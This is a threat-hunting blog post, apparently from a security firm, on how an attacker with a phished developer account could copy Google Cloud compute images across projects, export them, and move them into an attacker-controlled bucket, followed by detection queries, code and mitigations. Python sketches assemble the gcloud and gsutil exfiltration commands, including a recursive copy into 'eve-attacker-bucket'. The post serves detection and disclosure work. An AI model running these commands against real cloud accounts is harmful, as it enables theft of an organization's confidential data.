Introduction

If you’re wondering if the cloud era is here, you need only look at the latest stats. 67% of enterprise infrastructure is now cloud-based and 94% of enterprises use cloud services.1 It’s no wonder that public clouds like Google Cloud Platform (GCP) have become a new playground for threat actors. There is a lot to exploit.

As part of a recent Mitiga threat hunt activity, we examined different methods to perform exfiltration using many of Google Cloud Platform’s main services. While hunting, we came across several security gaps that we believe every organization using GCP should be aware of in order to protect itself from data exfiltration. We’ve detailed these in the Threat Hunting Guide below.

A Few Terms to Know When Using this Guide

There are several important components of GCP that you should be familiar with prior to reading this blog:

- Google Compute Engine Images (Compute Images)

“Operating system images used to create boot disks for instance.” — Google Documentation

- Google Cloud Storage Bucket

“Cloud Storage is a service for storing your objects in Google Cloud. An object is an immutable piece of data consisting of a file of any format. You store objects in containers called buckets.”

— Google Documentation

- Google Cloud Build API

“Cloud Build is a service that executes your builds on Google Cloud infrastructure. Cloud Build executes your build as a series of build steps. A build step can do anything that can be done from a container irrespective of the environment.”

— Google Documentation.

Exfiltrating GCP Compute Images: An Example

Let's say Alice is a software developer working at a company named “Aloe Vera” 🪴 on a highly confidential GCP project named “The Monstera Project.” 🌱

Bob is also a software developer in the same organization, but he works on a public-facing project named “The Cactus Project.” 🌵

Unfortunately for Bob, one day he accidentally clicks on a sophisticated phishing email sent to his work mailbox by our evil attacker, Eve.

Eve successfully bypasses Bob’s two-factor authentication (2FA), and now she has access to Aloe Vera’s GCP environment.

There are a few things you should know before we dive deeper:

- The most important component of “The Monstera Project” is compute images that contain the innovative logic behind this successful project.

- Not so long ago, Alice had a problem with the compute images in “The Monstera Project” and asked for Bob’s help. Alice granted Bob the roles compute.imageUser and project.viewer so he could help her debug the problem.

- Bob has the roles compute.admin, storage.admin, and roles/servicemanagement.serviceConsumer, plus the serviceusage.services.enable permission, in “The Cactus Project.”

Eve’s master plan is to exfiltrate the sensitive Compute Images from “The Monstera Project” to her account, using new methods that she hopes won’t be detected by the “Aloe Vera” organization’s security team.





As seen in Exhibit 1, the general outline of her plan is:

Step 1: Obtain Bob’s access to The Aloe Vera GCP organization. ✅

Step 2: Get access to “The Monstera Project” Images. ✅

Step 3: Create a copy of the Compute Images from “The Monstera Project” in “The Cactus Project.” ❌

Step 4: Export the Compute Images to a Google Storage Bucket in “The Cactus Project.” ❌

Step 5: Exfiltrate the Compute Image objects to an external, attacker-controlled Google Storage Bucket. ❌

Exfiltrating GCP Compute Images: A Deeper Dive

As we already established, Eve has access to Bob’s GCP account, and Bob’s user account has the roles compute.imageUser and project.viewer in “The Monstera Project.” (Steps 1 and 2 are largely done 🤩).

Eve’s next step (Step 3) would likely involve determining how to export the sensitive compute images from “The Monstera Project” to a Google Storage bucket. Yet a couple of problems arise: Eve has no storage permissions in “The Monstera Project,” nor can she enable the Cloud Build API there, which is necessary for exporting an image to a storage bucket.

What will she do next? She will try to find a way to move the compute images to a different GCP project, one where she has the storage.admin role that allows her to work freely with Google Storage services. In this scenario, Eve will try to copy the compute images from “The Monstera Project” to “The Cactus Project,” since she has Bob’s storage.admin role there.

Cross-Project Image Exfiltration

Exhibit 2. The attacker has already obtained access to the Aloe Vera GCP organization and the “Monstera Project” images, and has created a copy of the “Monstera Project” images in the separate “Cactus Project.”

GCP offers many useful methods for working with GCP compute images. The most common, easy way involves sharing compute images with an external entity by granting the external entity the following roles: compute.imageUser and project.viewer or compute.admin and project.viewer.

Bob’s account cannot be used for this method, since it would require granting roles to entities in the “Monstera Project.” In this scenario, Bob has only the roles compute.imageUser and project.viewer there, which do not allow him to grant roles in the “Monstera Project.”



To circumvent this problem, Eve uses another stealthy, unconventional method that is available only in the GCP CLI or Cloud Shell. It lets her recreate the sensitive images in a different project than their origin, by creating a new image in “The Cactus Project” whose source is an image in “The Monstera Project.”
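As a hedged illustration (not necessarily the exact command Eve ran), a cross-project copy of this kind can be expressed with `gcloud compute images create` and its `--source-image` and `--source-image-project` flags. The Python sketch below only builds the argument list and does not run it; the image and project names are hypothetical.

```python
from typing import List


def build_cross_project_copy_cmd(
    new_image: str, source_image: str, source_project: str, dest_project: str
) -> List[str]:
    """Return the gcloud argv that recreates an image in another project."""
    return [
        "gcloud", "compute", "images", "create", new_image,
        f"--source-image={source_image}",
        f"--source-image-project={source_project}",
        f"--project={dest_project}",
    ]


# Hypothetical names, for illustration only.
copy_cmd = build_cross_project_copy_cmd(
    new_image="monstera-copy",
    source_image="monstera-image",
    source_project="the-monstera-project",
    dest_project="the-cactus-project",
)
print(" ".join(copy_cmd))
```

The caller needs read access to the source image and permission to create images in the destination project, which matches the roles Bob holds in this scenario.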

Exporting Compute Images to Google Cloud Storage Bucket 🪣

Because Eve created copies of the compute images from “The Monstera Project” in “The Cactus Project,” she is now able to continue with her malicious plan. Onward to Step 4.



Exhibit 4. Master Plan Step 4 — Exporting the Compute Images to Google Storage Bucket in “The Cactus Project”

To exfiltrate the sensitive compute images from the Aloe Vera account to Eve’s account, Step 4 involves exporting each image to a Google Storage bucket in The Cactus Project. Eve uses Bob’s access to The Cactus Project, where Bob, as a developer who uses Google APIs, is allowed to enable services.



Now Eve is able to enable the Cloud Build API and use it to export the image copies she created into objects stored in Google Cloud Storage. The export compute image command exports only one image at a time using the Cloud Build API. Enabling the Cloud Build API is part of the export compute image command in the CLI.
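A minimal sketch of this step, assuming the standard `gcloud compute images export` command with its `--image` and `--destination-uri` flags. Because the export handles one image at a time, the sketch builds one command per image. The image, project and bucket names are hypothetical, and the commands are only printed, not executed.

```python
from typing import List


def build_image_export_cmd(image: str, project: str, bucket: str) -> List[str]:
    """Return the gcloud argv that exports one image to a bucket object."""
    return [
        "gcloud", "compute", "images", "export",
        f"--image={image}",
        f"--project={project}",
        f"--destination-uri=gs://{bucket}/{image}.tar.gz",
    ]


# Hypothetical image and bucket names; one export command per image.
copied_images = ["monstera-copy-1", "monstera-copy-2"]
export_cmds = [
    build_image_export_cmd(name, "the-cactus-project", "cactus-export-bucket")
    for name in copied_images
]
for argv in export_cmds:
    print(" ".join(argv))
```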

Exfiltrating compute image objects across organizations 😈

Because Eve has exported all the compute image copies to a bucket as objects, she now only needs to complete the last step of her master plan (Step 5).

Exhibit 6. Master Plan Step 5 — Exfiltrating the Compute Image objects to External Attacker Google Storage Bucket.

Eve wants to get the compute image objects she created in The Cactus Project into her own attacker-controlled Google Storage Bucket. So, she creates an attacker bucket in her evil organization and grants Bob’s Aloe Vera user permission to write new objects to that bucket using the role storage.objectAdmin.



Google has a CLI dedicated to storage methods called “gsutil”. Using the “cp” command with the “-r” flag, Eve recursively copies the content of a bucket to her external Google Storage bucket within GCP:

Exhibit 7. Copying bucket contents to a Google Storage bucket within GCP.
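For illustration, the recursive copy described above can be sketched as a `gsutil cp -r` invocation between two buckets. The bucket names below are hypothetical, and the snippet only assembles the argument list rather than running it.

```python
from typing import List


def build_bucket_copy_cmd(source_bucket: str, dest_bucket: str) -> List[str]:
    """Return the gsutil argv that recursively copies one bucket into another."""
    return [
        "gsutil", "cp", "-r",
        f"gs://{source_bucket}/*",  # gsutil expands this wildcard itself
        f"gs://{dest_bucket}",
    ]


# Hypothetical bucket names, for illustration only.
bucket_copy_cmd = build_bucket_copy_cmd("cactus-export-bucket", "eve-attacker-bucket")
print(" ".join(bucket_copy_cmd))
```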

With that, Eve completes her evil master plan to exfiltrate Aloe Vera’s most valuable assets and is now free to use that data for one of her other evil plans.

And now, the Fun Part: Inspecting the Logs 🕵️

In this section, we will share a method to inspect the Aloe Vera organization’s GCP activity and data access logs.

How to Detect the Cross-Project Image Exfiltration

Eve’s first step was to copy the images cross-project using a less conventional method.



In the Monstera Project, the logs were filtered by the “NOTICE” severity Google defines.

Two events remained, both showing that one or more sensitive images were used and exfiltrated.



On the other hand, the event logging in “The Cactus Project” looks a little different. There is only one type of event showing this activity, with the method name v1.compute.images.insert.

We can see that the sourceImage path contains “lab-2” while the resourceName path contains “lab-1,” which means a Compute Image was successfully created cross-project. To detect this activity, we search for a v1.compute.images.insert event in which the project name in the sourceImage differs from the project name in the resourceName.

One side note: As mentioned previously, the easiest method for sharing Compute Images across projects or organizations usually involves granting an external user the roles compute.imageUser / compute.admin + project.viewer, so the user will have access to the compute image, then creating an instance using the same shared image. This technique is also a nice way to infiltrate images into an organization.

This technique is much louder and easier to detect, since the role addition generates a set.permission event, which is usually very noisy, in addition to the compute.images.insert event. Moreover, this technique is very interesting and relatively simple: the threat actor only grants entities roles in their malicious organization and, through that, imports and exports data in and out of the attacked organization.
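The comparison described above can be sketched in a few lines of Python. This is a minimal example under stated assumptions: log entries are already parsed into dictionaries, sourceImage sits under `protoPayload.request`, and both paths contain a `projects/<name>/` segment. The helper names and the sample entry are hypothetical.

```python
import re
from typing import Optional

_PROJECT_RE = re.compile(r"projects/([^/]+)/")


def project_of(path: str) -> Optional[str]:
    """Extract the project segment from a resource path or URL."""
    match = _PROJECT_RE.search(path or "")
    return match.group(1) if match else None


def is_cross_project_image_copy(entry: dict) -> bool:
    """True when an images.insert event names a source image in another project."""
    payload = entry.get("protoPayload", {})
    if not payload.get("methodName", "").endswith("compute.images.insert"):
        return False
    # Assumed field location for the source image path.
    source = project_of(payload.get("request", {}).get("sourceImage", ""))
    target = project_of(payload.get("resourceName", ""))
    return source is not None and target is not None and source != target


# Hypothetical log entry shaped like the event described in the text.
sample_entry = {
    "protoPayload": {
        "methodName": "v1.compute.images.insert",
        "resourceName": "projects/lab-1/global/images/copied-image",
        "request": {"sourceImage": "projects/lab-2/global/images/secret-image"},
    }
}
print(is_cross_project_image_copy(sample_entry))
```

Entries without a sourceImage (for example, images built from a disk) are simply not flagged, which keeps the check narrow.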



How to Detect the Export Image

If the Cloud Build API was enabled during the export of the image, this can be detected by searching for the following event method name:

google.api.serviceusage.v1.ServiceUsage.EnableService


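A small sketch of that search, assuming parsed log entries where the enabled service appears in `protoPayload.resourceName` (for example, ending in `services/cloudbuild.googleapis.com`). That field location and the sample entry are assumptions for illustration.

```python
ENABLE_METHOD = "google.api.serviceusage.v1.ServiceUsage.EnableService"


def is_cloud_build_enable(entry: dict) -> bool:
    """True when the entry records Cloud Build being enabled in a project."""
    payload = entry.get("protoPayload", {})
    return (
        payload.get("methodName") == ENABLE_METHOD
        # Assumed: the service name is part of the resource name.
        and "cloudbuild.googleapis.com" in payload.get("resourceName", "")
    )


# Hypothetical entry, for illustration only.
enable_entry = {
    "protoPayload": {
        "methodName": ENABLE_METHOD,
        "resourceName": "projects/123456/services/cloudbuild.googleapis.com",
    }
}
print(is_cloud_build_enable(enable_entry))
```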

The main struggle in detecting this export is that the Cloud Build API tends to spam the logs. Cloud Build performs all of its jobs in containers, and each time it copies, starts, or even kills a container, it generates a log entry to indicate that. This high log volume makes detection more complicated.

Cloud Build can be used to perform a wide range of actions. Even a single task (e.g., exporting a Compute Image to a Google Cloud Storage Bucket) generates many events behind the scenes. The first event that indicates the export and the image involved has the method name compute.images.get. We can see that the entity that performed the request (principalEmail field) is “cloudbuild”:



The next event, which indicates the Google Storage Bucket the Compute Image was exported to, is storage.objects.create. This event is also generated by “cloudbuild.” Because there are many storage.objects.create events, we need to filter out those where the resourceName field contains the strings “log” or “daisy”.

We are left with a single log.
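The filter described above could look like the following sketch. It assumes parsed audit log entries with `principalEmail` under `protoPayload.authenticationInfo`. The function name and sample entries are hypothetical.

```python
def is_image_export_write(entry: dict) -> bool:
    """True for Cloud Build object writes that are not log or daisy artifacts."""
    payload = entry.get("protoPayload", {})
    principal = payload.get("authenticationInfo", {}).get("principalEmail", "")
    resource = payload.get("resourceName", "")
    return (
        payload.get("methodName") == "storage.objects.create"
        and "cloudbuild" in principal
        and "log" not in resource
        and "daisy" not in resource
    )


# Hypothetical entries: one export object and one build log object.
entries = [
    {"protoPayload": {
        "methodName": "storage.objects.create",
        "authenticationInfo": {"principalEmail": "123@cloudbuild.gserviceaccount.com"},
        "resourceName": "projects/_/buckets/cactus-export-bucket/objects/image.tar.gz",
    }},
    {"protoPayload": {
        "methodName": "storage.objects.create",
        "authenticationInfo": {"principalEmail": "123@cloudbuild.gserviceaccount.com"},
        "resourceName": "projects/_/buckets/build-logs/objects/log-abc.txt",
    }},
]
export_writes = [e for e in entries if is_image_export_write(e)]
print(len(export_writes))
```

One caveat with a plain substring filter: a bucket or object whose own name contains “log” or “daisy” would be excluded too, so the exclusion may need tightening in a real hunt.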

How to Detect Storage Exfiltration

Now you would expect to find logs showing the exfiltration, right?

Important Note:

GCP allows more storage logging when applying an organization policy named “detailedAuditLoggingMode.” This policy logs actions associated with Cloud Storage operations and contains detailed request and response information.

I will let you in on a little secret: even with the detailed logging constraint applied, Google logs the event of reading an object’s metadata in a bucket the same way it logs the event of downloading that same object. This lack of coverage means that when a threat actor downloads your data or, even worse, exfiltrates it to an external bucket, the only logs you see are the same as if the threat actor had just viewed the object’s metadata.

Another problem arises when Aloe Vera’s security team investigates the exfiltration event and turns to the GCP logs. In the logs describing the copy of the data from The Cactus Project’s Storage Bucket to Eve’s external account, the destination of the copy is not recorded: Eve’s attacker bucket is absent from the logs.



The relevant logs to detect this behavior are storage.objects.get, storage.buckets.get, and storage.objects.list.

Mitigation and additional detection:

After contacting Google’s security team and working with them on this issue, we compiled a list of steps that can be taken to mitigate and detect this attack:

- VPC Service Controls - with the use of VPC Service Controls administrators can define a service perimeter around resources of Google-managed services to control communication to and between those services.

- Organization restriction headers - organization restriction headers enable customers to restrict cloud resource requests made from their environments to only operate resources owned by select organizations. This is enforced by egress proxy configurations, firewall rules ensuring that the outbound traffic passes through the egress proxy, and HTTP headers.

- If neither VPC Service Controls nor Organization restriction headers are enabled, we suggest searching for the following anomalies:

a. Anomalies in the times of the Get/List events.

b. Anomalies in the IAM entity performing the Get/List events.

c. Anomalies in the IP address the Get/List requests originate from.

d. Anomalies in the volume of Get/List events within brief time periods originating from a single entity.

- Restrict access to storage resources and consider removing read/transfer permissions.
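As one hedged example of anomaly (d), the sketch below counts Get/List events per entity in fixed time windows and flags entities that reach a threshold. The window size, the threshold and the flattened event tuples are assumptions for illustration, and timestamps are assumed to be naive UTC datetimes. A real hunt would tune these values against the organization's normal baseline.

```python
from collections import Counter
from datetime import datetime, timedelta
from typing import Iterable, List, Tuple

READ_METHODS = {"storage.objects.get", "storage.buckets.get", "storage.objects.list"}
_EPOCH = datetime(1970, 1, 1)


def flag_read_bursts(
    events: Iterable[Tuple[datetime, str, str]],
    window: timedelta = timedelta(minutes=5),
    threshold: int = 100,
) -> List[str]:
    """Return principals with at least `threshold` Get/List events in one window.

    Each event is a (timestamp, principal, method_name) tuple.
    """
    counts: Counter = Counter()
    for timestamp, principal, method in events:
        if method not in READ_METHODS:
            continue
        # Index of the fixed window this timestamp falls into.
        window_index = int((timestamp - _EPOCH) / window)
        counts[(principal, window_index)] += 1
    return sorted({p for (p, _), n in counts.items() if n >= threshold})


# Hypothetical events: three reads by one principal within a few seconds.
start = datetime(2023, 1, 1, 12, 0, 0)
sample_events = [
    (start + timedelta(seconds=i), "bob@example.com", "storage.objects.get")
    for i in range(3)
]
sample_events.append((start, "alice@example.com", "storage.objects.list"))
print(flag_read_bursts(sample_events, threshold=3))
```

Fixed windows are the simplest choice here; a burst that straddles a window boundary can be split across two counts, so a sliding window may be preferable when precision matters.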

Google’s Response

We contacted Google’s security team and received the following response:

“The Mitiga blog highlights how Google’s Cloud Storage logging can be improved upon for forensics analysis in an exfiltration scenario with multiple organizations. We appreciate Mitiga's feedback, and although we don't consider it a vulnerability, have provided mitigation recommendations.”

Additional Links:

credit for the attacker image - https://icons8.com/icon/v1JR7fsYAuq2/fraud%22

Organization policy constraints for Cloud Storage - https://cloud.google.com/storage/docs/org-policy-constraints#:~:text=Detailed%20audit%20logging%20mode,-API%20Name%3A%20constraints&text=This%20constraint%20is%20recommended%20to,parameters%2C%20and%20request%20body%20parameters.

VPC Service Controls - https://cloud.google.com/vpc-service-controls

Organization restriction headers - https://cloud.google.com/resource-manager/docs/organization-restrictions/configure-organization-restrictions

LAST UPDATED:

June 23, 2025